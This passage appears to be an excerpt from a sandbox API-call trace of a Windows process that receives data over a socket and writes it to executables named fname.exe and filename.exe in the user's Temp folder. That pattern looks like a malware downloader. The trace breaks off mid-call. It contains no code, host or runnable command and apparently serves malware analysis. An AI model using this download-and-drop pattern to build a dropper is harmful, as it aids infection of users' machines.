[0289.854] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.856] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.856] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.858] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.858] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.860] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.860] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.867] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.867] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.870] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.870] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.881] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.883] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.884] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.885] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.887] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.888] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.889] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.889] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.891] recv (in: s=0x550, buf=0x21f613c, len=65536, flags=0 | out: buf=0x21f613c*) returned 65536 [0289.891] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0289.893] recv (in: s=0x550, buf=0x21f613c, len=55230, flags=0 | out: buf=0x21f613c*) returned 55230 [0289.911] SetEvent (hEvent=0x2ec) returned 1 [0289.912] WriteFile (in: hFile=0x34c, lpBuffer=0x21f613c*, nNumberOfBytesToWrite=0xd7be, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x21f613c*, lpNumberOfBytesWritten=0x19f25c*=0xd7be, lpOverlapped=0x0) returned 1 [0289.915] CloseHandle (hObject=0x34c) returned 1 [0290.050] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x25 [0290.051] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\fname.exe", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe") returned 0x2f [0290.051] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19ee10, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0290.057] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe", nBufferLength=0x105, lpBuffer=0x19ee24, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe", lpFilePart=0x0) returned 0x32 [0290.057] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe", nBufferLength=0x105, lpBuffer=0x19edf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\fname.exe", lpFilePart=0x0) returned 0x32 [0290.058] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", nBufferLength=0x105, lpBuffer=0x19ee10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x28 [0290.058] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\.", nBufferLength=0x105, lpBuffer=0x19eda4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp", lpFilePart=0x0) returned 0x28 [0290.058] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x25 [0290.058] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\fname.exe", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\fname.exe") returned 0x2f [0290.061] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x553e4a0 [0290.061] LocalAlloc (uFlags=0x0, uBytes=0x52) returned 0x5526d80 [0292.258] LocalFree (hMem=0x553e4a0) returned 0x0 [0292.259] LocalFree (hMem=0x5526d80) returned 0x0 [0292.260] ExpandEnvironmentStringsW (in: lpSrc="%tmp%", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 0x25 [0292.261] ExpandEnvironmentStringsW (in: lpSrc="%tmp%\\filename.exe", lpDst=0x19f1dc, nSize=0x64 | out: lpDst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\filename.exe") returned 0x32 [0292.261] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19ed04, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0292.262] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe", nBufferLength=0x105, lpBuffer=0x19ed18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe", lpFilePart=0x0) returned 0x35 [0292.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19f20c) returned 1 [0292.262] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\filename.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\filename.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x564 [0292.264] GetFileType (hFile=0x564) returned 0x1 [0292.264] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f208) returned 1 [0292.264] GetFileType (hFile=0x564) returned 0x1 [0292.265] QueryPerformanceCounter (in: lpPerformanceCount=0x19f29c | out: lpPerformanceCount=0x19f29c*=2618997616215) returned 1 [0292.266] SetEvent (hEvent=0x2ec) returned 1 [0292.270] select (in: nfds=0, readfds=0x2209570, writefds=0x0, exceptfds=0x0, timeout=0x19f174*(tv_sec=0, tv_usec=0) | out: readfds=0x2209570, writefds=0x0, exceptfds=0x0) returned 0 [0292.271] send (s=0x550, buf=0x21f3e1c*, len=44, flags=0) returned 44 [0292.272] setsockopt (s=0x550, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0 [0292.273] recv (in: s=0x550, buf=0x21f1c00, len=4096, flags=0 | out: buf=0x21f1c00*) returned 4096 [0292.331] setsockopt (s=0x550, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0 [0292.331] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 10504 [0292.332] WriteFile (in: hFile=0x564, lpBuffer=0x2219af4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2219af4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0292.333] WriteFile (in: hFile=0x564, lpBuffer=0x2209be6*, nNumberOfBytesToWrite=0x280a, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209be6*, lpNumberOfBytesWritten=0x19f25c*=0x280a, lpOverlapped=0x0) returned 1 [0292.334] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 2920 [0292.805] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 27740 [0292.806] WriteFile (in: hFile=0x564, lpBuffer=0x2219af4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2219af4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0292.807] WriteFile (in: hFile=0x564, lpBuffer=0x2209f80*, nNumberOfBytesToWrite=0x67c4, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209f80*, lpNumberOfBytesWritten=0x19f25c*=0x67c4, lpOverlapped=0x0) returned 1 [0292.808] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 2920 [0293.118] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 54020 [0293.119] WriteFile (in: hFile=0x564, lpBuffer=0x2219af4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2219af4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0293.119] WriteFile (in: hFile=0x564, lpBuffer=0x2209f80*, nNumberOfBytesToWrite=0xce6c, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209f80*, lpNumberOfBytesWritten=0x19f25c*=0xce6c, lpOverlapped=0x0) returned 1 [0293.121] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 2920 [0293.164] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 64240 [0293.165] WriteFile (in: hFile=0x564, lpBuffer=0x2219af4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2219af4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0293.167] WriteFile (in: hFile=0x564, lpBuffer=0x2209f80*, nNumberOfBytesToWrite=0xf658, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209f80*, lpNumberOfBytesWritten=0x19f25c*=0xf658, lpOverlapped=0x0) returned 1 [0293.169] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 23360 [0293.169] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x5b40, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x5b40, lpOverlapped=0x0) returned 1 [0293.169] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 2920 [0293.172] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 23360 [0293.173] WriteFile (in: hFile=0x564, lpBuffer=0x2219af4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2219af4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0293.173] WriteFile (in: hFile=0x564, lpBuffer=0x2209f80*, nNumberOfBytesToWrite=0x56a8, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209f80*, lpNumberOfBytesWritten=0x19f25c*=0x56a8, lpOverlapped=0x0) returned 1 [0293.174] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 2920 [0293.216] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.217] WriteFile (in: hFile=0x564, lpBuffer=0x2219af4*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2219af4*, lpNumberOfBytesWritten=0x19f25c*=0x1000, lpOverlapped=0x0) returned 1 [0293.218] WriteFile (in: hFile=0x564, lpBuffer=0x2209f80*, nNumberOfBytesToWrite=0xfb68, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209f80*, lpNumberOfBytesWritten=0x19f25c*=0xfb68, lpOverlapped=0x0) returned 1 [0293.225] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.226] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.229] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.229] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.231] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 34072 [0293.334] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x8518, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x8518, lpOverlapped=0x0) returned 1 [0293.337] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.339] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.347] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.347] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.368] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.368] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.372] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.373] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.381] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.382] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.391] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.392] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.403] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.403] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.404] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.405] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.406] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.409] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.410] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.467] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.492] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.493] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.509] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.512] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.516] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.517] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.524] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.526] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.539] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.539] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.546] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.547] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.551] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.553] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.560] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.560] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.568] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.568] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.570] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.570] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0293.571] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0293.571] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.318] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.319] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.322] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.322] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.324] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.324] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.325] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.326] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.327] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.327] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.333] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.334] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.344] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.355] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.356] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.356] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.358] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.358] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, lpNumberOfBytesWritten=0x19f25c*=0x10000, lpOverlapped=0x0) returned 1 [0294.360] recv (in: s=0x550, buf=0x2209ae8, len=65536, flags=0 | out: buf=0x2209ae8*) returned 65536 [0294.360] WriteFile (in: hFile=0x564, lpBuffer=0x2209ae8*, nNumberOfBytesToWrite=0x10000, lpNumberOfBytesWritten=0x19f25c, lpOverlapped=0x0 | out: lpBuffer=0x2209ae8*, 